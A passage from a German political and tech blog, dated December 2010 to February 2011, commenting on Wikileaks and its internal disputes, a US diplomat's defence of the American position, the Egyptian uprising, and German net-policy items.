Im Übrigen vertrat er dann so Positionen wie dass die Cables ja gezeigt hätten, dass die Amis tatsächlich hauptsächlich ihren Idealen entsprechend überall Menschenrechte und Demokratie hinbringen wollten. Das wollte das Publikum nicht gänzlich ohne murren schlucken und es wurden dann der Urheberrechts-Druck auf Spanien und die Waffenlieferungen an den Südsudan erwähnt. Oops.
Das Gespräch kam dann noch auf Bradley Manning (erstaunlicherweise die ganze Zeit, ohne den Namen zu nennen), und er meinte dann, das müsse man schon verfolgen, weil die USA seien ja ein Rechtsstaat und da gibt es Gesetze und das war ganz klar gegen die Gesetze, also müsse man das auch verfolgen. Und er persönlich fände das ja auch falsch, weil bei den Pentagon-Papers, da sei es ja um das Aufdecken von Missetaten der Regierung gegangen, das fände er ja in Ordnung, aber bei den Depeschen jetzt, das seien ja bloß interne Papiere ohne echten Aufklärungswert gewesen, das hätte niemandem genutzt, nur Schaden angerichtet. Und daraufhin brachte er eine absolut großartige Strategie, deren ganze Brillanz mir erst später klar wurde. Er fragte das Publikum, ob denn irgendjemand hier von dem Inhalt einer Depesche wirklich schockiert worden sei.
Wow. Brillianter Schachzug. Das kann ja keiner zugeben, ohne gleichzeitig einzuräumen, vorher nicht gut informiert gewesen zu sein. Also: entweder vorher nicht Teil der Elite gewesen zu sein, die sich ordentlich informiert, oder die solche Dinge eben weiß, oder zu doof, selbständig die richtigen Nachrichten zu konsumieren.
Die Strategie ging aber nicht auf, denn es fanden sich tatsächlich zwei-drei Kandidaten aus dem Publikum, die da Dinge zu kritisieren fanden. U.a. die Urheberrechte in Spanien, dann die Waffen in den Südsudan, das sei ja immerhin eine Krisenregion, und das dritte Beispiel hab ich vergessen. Da war aber glaube ich noch eines. Ist ja auch egal.
Jedenfalls blieb am Ende von der offiziellen US-Argumentationslinie nur noch die Fundamental-Variante übrig. Man müsse diesen Leaker verfolgen, weil es dagegen halt Gesetze gäbe. Den fundamentalen Unterschied zwischen Wikileaks und der New York Times konnte er dann auch nicht in Worte fassen und versuchte es erst damit, dass Wikileaks ja nicht einzelne Dokumente veröffentlichen würde, sondern so stapelweise, wie ein "Großhändler" (wholesale ist ein idiom an der Stelle in der englischen Sprache). Der Versuch, Wikileaks zu unterstellen, dass sie ja nicht ordentlich bereinigt haben, hat Frank ihm mit dem Hinweis zerlegt, dass ja bei den Depeschen die Medienpartner (!) und nicht Wikileaks die Namen rausgenommen hätten. Daraufhin ging das Argument natürlich nicht mehr.
Ich war zwar nur Zuschauer, aber habe am Ende noch die Gelegenheit zu einer Frage gehabt, und habe mir überlegt, die fieseste Frage wäre, wenn ich sie frage, wieso sie Wikileaks nicht sportlich nehmen, weil das doch eigentlich genau ihren Idealen von Free Speech, Pressefreiheit und Transparenz entspräche, und wir uns doch alle über ein paar saftige Leaks aus China und dem Iran freuen würden. Daraufhin kam er um die explizite Ansage nicht herum, dass sie ja aus fundamentalen Gründen gegen Wikileaks seien, nicht nur weil sie jetzt betroffen sind. Und das ist natürlich eine recht steile These, wenn man bedenkt, wie viele Jahre Wikileaks jetzt schon Dinge leakt, ohne dass die USA dagegen vorgegangen sind.
Unter dem Strich muß ich aber wirklich sagen: wow, das war ein Profi. Der wusste, was er da tat, und hat es beeindruckend gut gemacht. Ich habe es mir auch nicht nehmen lassen, ihm am Ende noch die Hand zu schütteln und zu gratulieren, wie gut er diese schwierige Position vertreten hat. Woraufhin er natürlich antworten musste, so schwierig sei die Position ja gar nicht. Hat Spaß gemacht, muß ich wirklich sagen. Wenn ich mal in die Verlegenheit komme, einen geplatzten Atomreaktor oder sowas der Presse zu erklären, das wäre ohne Frage der Mann, den ich dafür einstellen würde. Ich hab da übrigens gerade mal seinen Lebenslauf gegoogelt:
Mr. Moss has a Bachelors of Arts in English literature from Loyola University, New Orleans; a Master of Fine Arts in Fiction Writing from the Iowa Writers' Workshop and a J.D. from Tulane University.
Das ist ja auch mal ausgesprochen cool als Hintergrund für einen Diplomaten. Hut ab!
Zwei Dinge will ich noch explizit erwähnen. Frank meinte an der einen Stelle, die USA seien ja nach 9/11 von ihrem Weg der Freiheit abgekommen und brauchten vielleicht etwas wie Wikileaks als Korrektiv. Da sind ihm kurzzeitig ein wenig die Gesichtszüge entgleist :-)
Und die andere Sache war, dass Frank explizit das Problem mit der Beschlagnahme von Elektronik an der Grenze ansprach, und dass da ja wild Wikileaks-Sympathisanten von ihren Geräten getrennt würden, und das sei ja besorgniserregend. Da war die beste Strategie dann, gar nicht darauf einzugehen. Nicht mal ein Medienprofi wie der Moss hat Argumente, um das Gebaren der TSA zu entschuldigen. Wow.
Oh und ein Money Quote hab ich noch. "Die größten Verbrechen der Bush-Regierung, also Untaten, wenn Sie das so nennen wollen, kamen durch den Freedom of Information Act heraus, nicht durch Leaks". Das fand ich ausgesprochen krass, dass ein offizieller US-Botschafts-Presseattaché von den "größten Verbrechen der Bush-Regierung" spricht.
Im Übrigen will ich den nicht in Schwierigkeiten bringen, dessen Job ist schon hart genug. Insofern betrachtet mal alle Aussagen hier als nicht belastbare Anekdoten und Hörensagen.

Wed Feb 9 2011

[l] Ich wollte mich ja zurückhalten zu dem Thema, aber so langsam platzt mir doch der Kragen. Jetzt hat gerade Julian Assange einen bekannten Anwalt gegen Daniel Domscheit-Berg losgeschickt, weil Daniel vor dem Gehen bei Wikileaks noch die unbearbeiteten Daten aus der Submission-Queue mitgenommen hat. Seine Darstellung ist, dass er die Daten "sichergestellt" hat, weil Wikileaks nicht mehr die Infrastruktur hatte, um den Quellenschutz zu garantieren. Er sagt, er wollte die Daten zurückgeben und will sie immer noch zurückgeben, aber verlangt vorher, dass Julian demonstriert, dass er mit den Daten "verantwortungsvoll" umgeht und den Quellenschutz garantieren kann. Das schreibt Daniel in seinem die Tage erscheinenden Buch über Wikileaks und die Medien berichten auch darüber.
Nun will ich mir nicht zu beurteilen anmaßen, ob die Einschätzung stimmt oder nicht, dass Wikileaks keinen Quellenschutz mehr garantieren kann. Ich hätte das noch letzte Woche verhalten bejaht, und glaube das auch immer noch zumindest teilweise, aber das beruhte und beruht hauptsächlich auf Aussagen von Daniel. Und wie glaubwürdig die sind, dass erscheint mir im Moment immer weniger klar. Zumal ich, wie viele Hacker, in der Anfangszeit von Wikileaks meine Hilfe angeboten habe, denn mit skalierenden Webseiten kenne ich mich aus und Wikileaks skalierte nicht, fühlte sich wie ein einzelner alter PC an. Damals kamen dann so Ausflüchte ala das seien viele verteilte Rechner und total kompliziert und gar nicht offensichtlich und ich könne da gar nicht groß helfen, aber wenn ich wirklich wolle, könne man mir einen Kontakt geben. Hat man aber nie. Und was muss ich heute lesen? Das war nur ein PC. Es war doch offensichtlich. Ich habe ja für viel Verständnis, aber von anderen Techies angelogen zu werden, dafür habe ich kein Verständnis. Schon gar nicht, wenn ich Hilfe angeboten habe.
In dem Kontext muss ich jetzt natürlich auch die Vertrauenswürdigkeit der anderen Aussagen aus der Ecke herabstufen.
Mein aktueller Stand zur Situation ist: wir haben zwei große Kinder mit zu großem Ego, die sich jetzt gegenseitig mit Scheiße bewerfen. Ergebnis ist, dass beide jedwede Glaubwürdigkeit verspielt haben. Und insbesondere soll Daniels Buch einige Chat-Protokolle enthalten (ich habe es noch nicht gelesen, insofern betrachte ich das mal als Gerücht). Transparenz ist ja gut und schön, aber wenn jemand schon die Vertraulichkeit von einem privaten Chat nicht würdigen kann, dann kann ich ihm auch nicht vertrauen, wenn es um die Vertraulichkeit von meinen geleakten Dokumenten geht.
Und Julian hat sich auch wie ein Arsch verhalten, und damit meine ich jetzt gar nicht mal nur gegenüber Frauen. Aus meiner Sicht haben die beide ihren Kredit verspielt, und während die sich im Sandkasten mit Sand bewerfen, haben wir gar keine funktionierende Leak-Site mehr. Der dritte Kandidat, Cryptome, hat ja mit ihrer wie persönlicher Neid von John Young aussehenden Agenda gegen Wikileaks auch allen Kredit verspielt bei mir. Wenn ich gerade was zu leaken hätte, würde ich es vermutlich über den CCC zu leaken versuchen.
Das Konzept von Openleaks überzeugt mich privat auch nicht. Also der Teil, den ich bisher davon gehört habe. Weil das alles noch im Fluss ist, werde ich darüber jetzt nicht viele Worte verlieren. Wir haben ja eine Alternativlos-Sendung mit Daniel geplant, da wird er dann Gelegenheit haben, uns das mal so zu erklären, dass wir doch wieder Vertrauen fassen können.
Aber im Moment bin ich einfach nur enttäuscht davon, wie sich diese ganzen idealistischen Heldenprojekte selbst zersetzt haben. Besser als es jede Zersetzungsstrategie der US-Regierung hätte schaffen können.
Apropos. Ihr habt vielleicht gehört, dass Anonymous bei HBGary eingedrungen und einen Haufen Emails gestohlen hat. HBGary war eine der Firmen, die der US-Regierung ein Anti-Wikileaks-Projekt verkaufen wollten, und bei den Emails ist u.a. eine Präsentation dabei, wie man Wikileaks am besten zersetzen kann. Wenn wir jetzt eine funktionierende Leakplattform hätten, hätte man das prima dorthin leaken können. So … müssen wir deren Wort vertrauen. Die Emails gibt es wohl irgendwo als Torrent, und da kann sich dann jeder selber die Präsentation rauspopeln. Und so zeigt sich, was bisher immer wie ein doofes Argument aussah: die Anti-Contentmafia-Technologien sind am Ende auch die Anti-Unterdrückungsstaat-Technologien und nicht nur wertneutral sondern sogar positiv zu bewerten.
Oh, einen noch. Die gestohlenen Daten da gerade. Openleaks will die gar nicht veröffentlichen, sagen sie. Nicht? Warum denn nicht? Wikileaks sagt gerade auch nichts von Veröffentlichen, die wollen die nur wiederhaben erstmal. Wir haben hier also, mal überspitzt ausgedrückt, zwei Diebe, die sich um Hehlerware streiten. Und akut veröffentlichen will die Daten auch niemand. Das war ja die Ausrede und Legitimation, warum die überhaupt eingesammelt wurden. Die aus der Hehlerware legitime Leak-Daten gemacht haben.
Update: Kurze Klarstellung zur der "Hehlerware". Was ich damit sagen will: das zeigt, dass die Bits ihren Wert daraus beziehen, dass sie noch nicht veröffentlicht wurden. Diesen ganzen Streit gäbe es nicht, wenn Wikileaks getan hätte, was sie von Anfang an angesagt hatten, das sie tun würden: alles direkt veröffentlichen. Die Daten erfahren also eine Wertsteigerung dadurch, dass sie noch unveröffentlicht sind. Daher darf man das auf-unveröffentlichten-Daten-sitzen auch nicht bloß als Schlampigkeit oder Faulheit bewerten, sondern das ist eine Wertsteigerung. Keine der beiden Sites hat einen Anspruch auf diese Daten. Die sind Wikileaks anvertraut worden, weil sie versprochen haben, das zeitnah zu veröffentlichen. Das haben sie nicht getan. Teilweise gibt es dafür sicher rationale Gründe, das will ich gar nicht abstreiten. Aber Fakt ist, dass die Daten dadurch einen Wert haben, der jetzt zu Streit führt. Und der Quelle ist ja letztlich egal, wer das veröffentlicht. Hauptsache es veröffentlicht jemand was. Das einzige, was nicht im Sinne der Quelle, nicht im Sinne der Öffentlichkeit und nicht im Sinne der Ideale ist, die Wikileaks und Openleaks für sich reklamieren, ist was jetzt mit den Daten passiert, nämlich dass sie irgendwo unveröffentlicht rumliegen.
Außerdem weist mich gerade jemand darauf hin, dass es nicht zwei Diebe sind, die sich um Hehlerware streiten, sondern zwei Hehler, die sich um Diebesgut streiten :-)
Der eigentliche Punkt dieser ganzen Vergleiche ist jedenfalls, dass die Daten genau deshalb illegitim sind gerade, und auch nur deshalb einen Wert haben, der den aktuellen Streit rechtfertigt, weil sie nicht veröffentlicht wurden. Dabei war genau das die Ausrede, und gleichzeitig die Begründung, die aus der illegitimen Hehlerei legitimes Whistleblowing gemacht hätten.
Update: Ach Mann, die ganzen kriminologischen Begriffe sind unpassend. Ich distanziere mich hiermit ausdrücklich von der Contentmafia-Idee, dass kopierte Bits kriminell sind.
Update: Frank hat sich auch mal Luft gemacht in der Angelegenheit. Ist ja auch alles echt unerfreulich.

Tue Feb 8 2011

[l] Sowas hier sollte auch mal jemand mit der GEMA machen.
Ich kriege ja gelegentlich Pressemails von denen. Ich warte ja schon immer darauf, dass die VG Wort von mir Geld für die GEMA-PR-Mails haben will oder so. Da hängt bestimmt auch irgendein Pferdefuß dahinter, abgesehen von der offensichtlichen Geld- und Zeitverschwendung.
Wenn ich mich nicht irre, sind das die gleichen Leute, die auch das Callcenter-Ding gemacht hatten. (Danke, Jens)
[l] Jetzt geht es ans Eingemachte: Angeblich wird in Ägypten jetzt der Suezkanal bestreikt. Bisher wohl keine operativen Auswirkungen, aber das kann ja noch kommen.
Oh und dann gibt es da aktuell noch das Gerücht, dass Mubarak 70 Milliarden Dollar Vermögen angehäuft haben soll über die Jahre, was ihn mit deutlichem Abstand zum reichsten Mann der Welt machen würde.
[l] An Frechheit kaum zu überbieten: Deutsche-Bank-Anwalt droht mit neuer Finanzkrise, wenn die Bank vor Gericht wegen Falschberatung ihrer Kunden verliert. Und das zeichnet sich wohl ab, dass sie verlieren. Kontext: Die Deutsche Bank hat gerade wegen des Kaufes der Postbank "nur" 600 Millionen Euro Quartalsgewinn gemacht.

Sun Feb 6 2011

[l] Wie die Münchner Staatsanwaltschaft den Sohn von Gaddafi in Ruhe lässt. Da scheint ja des Vaters Verhalten gegenüber der Schweiz mächtig Eindruck gemacht zu haben :-)
Naja, gut, und da ist von Diplomatengepäck die Rede, da ist das eh nichts mit normalen Ermittlungen. Aber als Vorwand für einen Link auf die alten Schweiz-Geschichten kann es dienen.

Thu Feb 3 2011

[l] Der letzte IPv4-Block ist gerade an das RIPE vergeben worden.
Das heißt noch nicht, dass IPv4 generell alle ist. RIPE verteilt das ja weiter. Und RIPE ist ja auch nur für Europa zuständig. Aber es hat schon was von Endzeitstimmung, die haben extra einen Webcast dafür gemacht, und als der Block verteilt war, spielten sie klassische Musik.

Wed Feb 2 2011

[l] Ach nee. De Telegraaf, die größte Zeitung der Niederlande, veröffentlicht für ein paar Minuten die Story, dass Schweden die Anklage gegen Julian Assange fallen lässt. Dann ist die Meldung wieder weg.
Warum würde sowas passieren? Eure Theorie ist so gut wie meine an der Stelle. Vielleicht wussten die was und haben es versehentlich zu früh veröffentlicht. Vielleicht hat ein Azubi Mist gemacht. Ist auf jeden Fall ein schöner Fnord.
Update: Rop hat sein Blog aktualisiert. Das war offenbar ein Twitter-Hoax, auf den der Telegraaf da reingefallen ist.

Tue Feb 1 2011

[l] Soooo, nach langer (?) Pause gibt es einen neuen Alternativlos: Alternativlos 11 mit dem Thema Revolution in Ägypten, Internet-Abschalten und Revolutionen im Allgemeinen.
Uns sind ein paar Dinge dazwischen gekommen, und wir haben die Folge über Openleaks verschoben, damit sich da ein paar inhaltliche Details noch klären können. Wir hoffen, ab jetzt wieder auf unsere Sendefrequenz von ungefähr zwei Sendungen pro Monat zu kommen.
Am Ende dieser Folge haben wir ein kleines Experiment gemacht. Wir hoffen, ihr habt damit so viel Spaß wie wir es hatten. Auch wenn es uns ein bisschen entglitten ist *hust* :-)
BTW: Wir haben jetzt mehr Sondersendungen als reguläre Sendungen. Ja, ist uns aufgefallen. Das liegt daran, dass die bei euch besser ankommen. Wir werden vermutlich irgendwann einfach aufhören, die Sondersendungen zu nennen.
[l] Kleines Randdetail zum Swift-Abkommen: Das Swift-Abkommen räumt den Amerikanern Zugriff auf innereuropäische Überweisungs-Bankdaten ein. Hatte ich glaube ich schon mal erwähnt irgendwo, dass das ein Problem sein könnte. Nun, jetzt haben wir es schriftlich.
Update: Übrigens, der Hinweis sei erlaubt, das ist jetzt so, weil die Spezialexperten sich vor der Abstimmung nicht informiert haben, worüber sie da eigentlich abstimmen. Und wir haben das angesagt vorher, dass sie das nicht machen sollen. Sie haben es trotzdem gemacht. Daher ist das für mich ein Fall von Vorsatz und Bösartigkeit, nicht von Inkompetenz und Verkacken.
[l] Ah! Die plötzlichen progressiven Positionen der CSU klären sich: Telepolis berichtet vom CSU-Netz-Dingens:
Der bayerische Ministerpräsident, der gerade aus Davos kam, meinte unter anderem, dort habe sich sein russischer Amtskollege Medwedew mit der Begründung gegen Netzsperren ausgesprochen, das Internet habe den politischen Wandel in Tunesien erst möglich gemacht. Und hinter Russland, so Seehofer, wolle er in Freiheitsfragen ungern zurückstehen.
In diesem Sinne: ein herzliches Dankeschön an Russland, dass sie unsere Machthaber in die richtige Richtung beschämt haben.

Sat Jan 29 2011

[l] Mubarak versucht ja gerade, seinen Kopf aus der Schlinge zu ziehen, indem er die Lage einfach aussitzt und ein paar händwischende Pseudo-Konzessionen anbietet. Er macht eine neue Regierung, hat er angeboten — allerdings wieder mit ihm an der Spitze. Das ist natürlich nicht, wofür die Leute da auf die Straße gegangen sind.
Nun, jetzt ist bekannt geworden, dass sein Vizepräsident dort der Geheimdienstchef ist. Ich hoffe mal, dass er damit nicht durchkommt. Der Polizei- und Geheimdienstapparat in Ägypten ist für seine Folterungen bekannt. Die gehören alle zugemacht und neu gegründet, nicht auch noch an der Regierung beteiligt. Wikipedia zu ihm.

Fri Jan 28 2011

[l] Mhh, in Ägypten sind professionell aufgemachte Flugblätter aufgetaucht, die Verhaltenshinweise im Falle einer Revolution geben. Das mag gutartig sein, aber da läuft es mir kalt den Rücken runter. Für sowas gibt es heutzutage eigene Abteilungen in den Armeen von Ländern, wie man in anderen Ländern unliebsame Regimes so plättet, und da eine willfährige Puppenregierung installiert, aber es nach einer gerechten Revolution des Volkes aussehen lässt. Hoffentlich ist das gutartig und das kommt jetzt nicht schlimmer als vorher in Ägypten.
Eine der Befürchtungen ist, dass hinter den Aufständen die Muslim Brotherhood stecken könnte, die als Wiege des Islamismus gilt. Dafür sieht dieses Blog des Ex-Reuters-Chefs in Kairo keine Hinweise, meint dass die im Gegenteil allen Grund haben, die Füße still zu halten gerade. Eines ist jedenfalls klar: die USA stecken nicht dahinter. Für die ist Mubarak seit Jahrzehnten einer der wenigen halbwegs stabilen arabischen Partner und auch Israel kann eigentlich nur verlieren, wenn da jetzt eine Revolution losgeht. Damit sind aber die üblichen Verdächtigen vom Tisch, denen man in der Gegend so eine Aktion zutrauen würde. Vielleicht ist das ja wirklich eine Revolution des Volkes.
Lustigerweise hat die Regierung offensichtlich den Twitter-Revolution-Bullshit von der Iran-Propaganda geglaubt und erstmal das Internet abgeklemmt :-)

Wed Jan 26 2011

[l] Die IuK-Kommission schaltet mal eben Adhocracy ab. Adhocracy ist ein Liquid-Democracy-Tool aus dem Umfeld der Piraten und war im Rahmen der Internet-Enquete-Kommission aufgestellt worden. Jetzt haben sie es mit folgender Begründung wieder ausgemacht:
Offizielle Begründung von Schwarz-Gelb: Nachdem man über Weihnachten nochmals Unterlagen gesichtet habe, sei die Erkenntnis gewachsen, dass auf das "Adhocracy"-Modell verzichtet werden könne. "Die Kosten sprengen möglicherweise den Rahmen", sagt IuK-Mitglied Michaela Noll. Außerdem sei fraglich, meint die CDU-Abgeordnete und parlamentarische Geschäftsführerin der Unionsfraktion, ob das System bis zum geplanten Enquete-Zwischenbericht im April/Mai noch zu implementieren gewesen wäre. Die Kommission sollte stattdessen andere Möglichkeiten zur Bürgerbeteiligung nutzen, die es bereits gebe - beispielsweise ein Forum und ein Blog, fordert Noll.
So sieht das aus. Das ist Bürgerbeteiligung ganz nach dem Geschmack von Schwarz-Geld. Die Bürger dürfen machtlos zugucken und in den Foren über die Bundesliga und die olympischen Spiele reden. Bloß nicht abstimmen lassen!1!! Mehr Demokratie als alle vier Jahre will doch hier keiner (der Politiker)!

Mon Jan 24 2011

[l] Radio Fritz hat einen Offenen Brief von Su Holder an die Familienministerin zensiert. Sehr, SEHR schade. Besonders wenn man sich den Brief mal anguckt. Gut, den Satz am Ende hätte man ohne Schmälerung der Wirkstärke auch weglassen können. Und das "bescheuert" schoss ein bisschen über das Ziel hinaus. Aber genug, um es vorauseilend zu zensieren? Nein.
Aus Ministerien und großen Firmen kennt man das eher andersherum. Der Chef stellt sich hinter seine Untergebenen, auch wenn er der Meinung ist, dass sie einen Fehler gemacht haben. GERADE wenn er der Meinung ist, sie haben einen Fehler gemacht. Das ist die Aufgabe eines Chefs. In der Außendarstellung steht er immer 100% hinter seinen Leuten, bis die etwas so dummes tun, dass sie dafür realistisch mit Knast bedroht sind. Intern kann man dann ein paar klare Worte sagen und den Vertrag nicht verlängern, aber extern? Das sieht so dermaßen schlecht für den Chef aus, wenn der seine eigenen Leute zurückpfeift, dass der Sender hier Schaden genommen hat.
Na egal. Sie wollten einen Streisand-Effekt, sie sollen ihn haben. Inhaltlich hat Su Holder natürlich völlig Recht. Das ist eine Schande, wenn die ~~Köhler~~ Schröder da herumschwadroniert
"Wir werden dann vor den gleichen Herausforderungen stehen wie viele andere Paare in Deutschland, bei denen beide beruflich sehr gefordert sind", sagte sie dem Blatt. "Aber wir sind zuversichtlich, dass wir das auch mit Unterstützung unserer Familien hinbekommen".
Anders als mit Spott und Hohn kann man da meiner Ansicht nach gar nicht drauf reagieren.

Fri Jan 21 2011

[l] Oh und wo wir gerade bei Telepolis waren: dieser Artikel über INDECT lohnt sich auch. Ein Schenkelklopfer! INDECT spürt jetzt auch Produktfälschungen hinterher, z.B. einer kritischen Webseite über sie, die ihrer Meinung nach layouttechnisch zu nahe am Original liegt. Money Quote:
Immerhin hatte sich ein INDECT-Macher dann doch noch auf den Weg zu einer kritischen Präsentation anlässlich des jüngsten CCC-Kongresses gemacht, um dort das Podium zu entern und beschwichtigend auf das Publikum einzureden. "Alle Dokumente, die öffentlich sein sollen, sind öffentlich", entkräftet der Forscher unter Gelächter.
Harharhar

Wed Jan 19 2011

[l] Jurablogs ist offline. Jemand hatte sich über einen Inhalt beschwert und daraufhin soll Hetzner, der ISP, das schlicht zugemacht haben.
Das ist die Kehrseite der billigen Internetprovider. Das ist so ein Massengeschäft geworden, dass sich da keiner mehr groß Beschwerdemanagement leisten kann. Wenn Beschwerden reinkommen, klemmen die lieber ab, weil die pro Jahr weniger Profit pro Kunde machen, als die ordentliche Bearbeitung so einer Beschwerde kostet. Kann man ja auch irgendwie nachvollziehen, aber für Kunden ist das natürlich scheiße.
Und da kann man sich auch sicher einen schlaueren Kunden zum Zumachen suchen als ein Jura-Blog. Jetzt wird sich zeigen, ob ein zu Unrecht abgeklemmter Kunde da nicht den ISP in Regress nehmen kann.
Update: ist wieder online.

Mon Jan 17 2011

[l] Spaßige Geschichte über das US-Prozedere zur Medikamentenzulassung für Menschenversuche. Naja, "spaßig" ist das auch nur aus der Ferne.
Schon das System an sich überzeugt. Die Behörde FDA, die für Medikamentenzulassungen zuständig ist, hat die Prüfung der Anträge für Menschenversuche an Drittfirmen outgesourced, die dann von den Pharmakonzernen bezahlt werden. Um mal zu testen, wie gut das funktioniert (ha!), hat das GAO (der US-Rechnungshof) ein Fake-Medikament einer nicht existierenden Pharmafirma angemeldet und direkt die Versuche erlaubt bekommen.
Als das so gut lief, haben sie einen zweiten Test gemacht, und eine nicht existierende Fake-Firma bei der FDA als Prüf-Drittfirma angemeldet und sind auch sofort reingekommen. Der Name der Firma? "Phake Medical Devices". m(

Sat Jan 15 2011

[l] Das Iphone ist nicht für Minusgrade gemacht, sagt die Apple-Garantieabteilung, nachdem einer Norwegerin bei -12 Grad ihr Iphone zersplittert (!) ist.
Mit anderen Worten: für Kalifornien gemacht, nicht für Kontinentaleuropa.

Fri Jan 14 2011

[l] Die Schufa hat ja den Slogan "wir schaffen Vertrauen". Wie das in der Praxis aussieht, kann man gut auf diesem Screenshot sehen, den mir gerade jemand gemailt hat :-)

Tue Jan 11 2011

[l] Angeblich soll Arafat an Thallium-Vergiftung gestorben sein. Das gerüchtet der Iran und beruft sich auf einen Arafat-Berater. Der sagt, er habe die Daten von einem britischen Forensik-Team, das er aber nicht benennen will.
Auf der einen Seite klingt das nicht völlig unglaubwürdig, dass Israel Arafat vergiftet haben könnte. Auf der anderen Seite war der Mann alt und gebrechlich und hätte eh nicht mehr lange gemacht. Auf der dritten Seite ist die ganze Gegend eine Quelle von substanzlosen Verschwörungstheorien. Insofern würde ich da jetzt erstmal nicht viel drauf geben, bis es da ein belastbares Gutachten gibt. (Danke, Steffen)

Tue Jan 4 2011

[l] Das Liquid-Feedback-Team der Piraten wirft entmutigt hin. Na SUPER, liebe Piraten, das habt ihr ja TOLL gemacht. Das war die eine Hoffnung, die wir in diesem Land hatten, doch mal Transparenz und Nachvollziehbarkeit in die Politik zu kriegen. Da könnt ihr euch ja mal mit Anlauf auf die Schulter klopfen, so viel sinnlose Zerstörung kennt man sonst nur von der CDU. Zum Kotzen!
BTW: So ungefähr jetzt hätte ich ja gerne mal eine Verschwörungstheorie, wer hinter dieser Aktion steckte. Antideutsche? CDU-Maulwürfe? V-Männer des Verfassungsschutzes? Der Mossad? Monarchisten? Wenn jemand eine halbwegs ernsthafte Theorie hat: her damit! Wer könnte sonst noch ein Interesse daran haben, die Rettung der Demokratie in diesem Lande zu verhindern?

Mon Jan 3 2011

[l] Und noch eine lesenswerte Depesche: Japan hat versucht, die Amis dazu zu bringen, dass sie Sea Shepherd die Gemeinnützigkeit aberkennen. Sea Shepherd macht Front gegen die Walfänger aus Japan und versucht die mit gefährlichen Aktionen auf hoher See aufzuhalten. Was früher Greenpeace gemacht hat, wissenschon. Und die Amis haben sich tatsächlich darauf eingelassen, das mit den Japanern zu diskutieren.

Mon Dec 27 2010

[l] Die ersten Eindrücke vom Congress sind sehr positiv. Die Keynote hat dieses Jahr Rop Gonggrijp gemacht, und das war eine ausgesprochen gute Keynote mit reichlich Anregungen zum Nachdenken. Und das sage ich nicht nur, weil er mein Blog erwähnt hat :-)
Danach gab es eine denkwürdige Szene. Wenn ihr auf dem letzten Camp oder den letzten beiden Congressen wart, dann habt ihr Nick Farr kennengelernt, der bei Ankündigungen und Publikum-Defragmentieren geholfen hat, und durch seinen gediegenen Anzug vielen in Erinnerung geblieben ist. Dieses Jahr kam die Idee auf, dass möglichst viele Hacker in Anzügen kommen sollen an Tag 1, und im Gegenzug würde Nick Farr dann im Hoodie mit Baggy Pants kommen und wir würden ihm Bling umhängen. Das hat auch stattgefunden und da waren so geschätzte 42 Hacker in Anzug bzw Kostüm auf der Bühne, und die sahen fast genau so unglücklich aus in ihrer Kleidung wie Nick Farr in seinem Rapper-Outfit. Da gibt es bestimmt bald Fotos von, wenn ich eines finde, verlinke ich es hier als Update.
Update: Youtube hat ein Video

Thu Dec 23 2010

[l] Julian Assange hat Al Jazeera ein spannendes Interview gegeben, voller spannender Einsichten. U.a. widerspricht er da der Darstellung, er sein Anarchist. Die Fragen sind wenig sensationalisierend, und von den Antworten von Julian kann man auch als ausgekochter PR-Profi noch was lernen, wie ich finde. Natürlich ist er da unter starkem Stress und hätte vielleicht ein-zwei Dinge noch geschickter formulieren können, aber insgesamt bin ich doch recht beeindruckt, wie gut er das gemacht hat. Insbesondere als es zu der Frage kommt, ob er glaubt, er kriege in Schweden eine faires Verfahren. Sehr sehenswert!

Tue Dec 21 2010

[l] Die Briten schaffen dann mal ihre Personalausweise wieder ab. Schon in den 70ies haben Kabarettisten Witze darüber gemacht, wie die britische Regierung zum wiederholten Mal "ID Cards" einführen wollte und damit vollumfänglich scheiterte. Das ist sowas wie der Treppenwitz der britischen Politik.
Oh, übrigens, wo wir gerade bei den Briten waren. Die Straßen sind zu, die Bahn fährt nicht, die Flugzeuge sind am Boden, aber das Terrorismus-Bedrohungsniveau ist "Severe". Der Brüller! :-)
[l] Journalisten von Eisenbahn-Magazin verhaftet, weil sie … Fotos von Zügen gemacht haben. In New York.

Fri Dec 17 2010

[l] Motion Capturing hat ja in der Videospielindustrie eh schon die Branche weitgehend überrannt. Aber bisher bezieht sich das auf den Körper, Rennbewegungen und so, und man bastelt aus den Übergängen eine Bewegung zusammen, die dann immer noch komisch aussieht, wenn man sich komisch bewegt, z.B. bei Mass Effect 2. Das sieht schon verdammt gut aus, aber die nächste Generation von Spielen benutzt richtig hochauflösende 3d-Aufnahmen des Gesichtes. Ich finde das ja ein bisschen schade, weil es eben immer mehr Macht zu immer den gleichen Leuten schiebt. Man konnte das ganz gut bei den 3d- und Trickfilmen sehen, die früher alle spezielle Sprecher hatten, die halt Trickfilme machten, aber heute sind das alles reguläre Schauspieler aus Kinofilmen. Die Leute, die früher Sprache in Trickfilmen gemacht haben, sind heute halt arbeitslos. Und so wird das in Computerspielen auch bald sein, dass man wirklich überall immer dieselben Gesichter sieht und Stimmen hört. Mir kamen mindestens drei Gesichter und Stimmen bekannt vor.
Unabhängig davon sieht das wirklich auffallend gut aus in dem Trailer :)

Wed Dec 15 2010

[l] Time Magazin ist eingeknickt und hat doch lieber Mark "Facebook" Zuckerberg zur Person des Jahres gemacht, nicht den in den Abstimmungen deutlich vorne liegenden Julian Assange.
Das ist halt nicht in Amerika auch nicht Presse sondern ein PR-Organ der Industrie.

Mon Dec 13 2010

[l] Indien hat einen einreisenden US-Professor am Flughafen abgefangen und will ihn rausschmeißen. Der Prof hatte vorher auf Sicherheitslücken in deren Wahlcomputern hingewiesen. Und jetzt haben sie sich offenbar so in die Hosen gemacht, er könne da eventuell einen Wahlcomputer schief angucken und dann verwandeln sie sich zurück in Kürbisse. Der wollte übrigens zu einer Konferenz anreisen, nicht um sich Zugriff auf einen Wahlcomputer zu beschaffen.
[l] Hans Leyendecker im Streitgespräch mit Philip Banse über Wikileaks. In dem Gespräch dominiert Philip Banse (das ist übrigens der, der das dctp-Videointerview mit mir gemacht hat vor ner Weile) den Leyendecker deutlich. Das liegt vor allem daran, dass der Leyendecker wirklich gar keinen Punkt hat und da im Kreis redet und sich da sogar selber widerspricht (z.B. in der Frage, ob er jetzt die geleakten Daten inhaltlich anzweifelt oder nicht).
Das Highlight ist, als er meint, er sei ja jetzt 61, und je älter er wird, deso mehr Schwierigkeiten hat er mit dem Publikum. Ja! Er beschimpft seine Leser! Und dann geht es los gegen die bösen Verschwörungstheoretiker, und dass die Leute ja im Grunde die Artikel gar nicht mehr lesen sondern nur noch kommen, um ihre Vorurteile zu bestätigen.
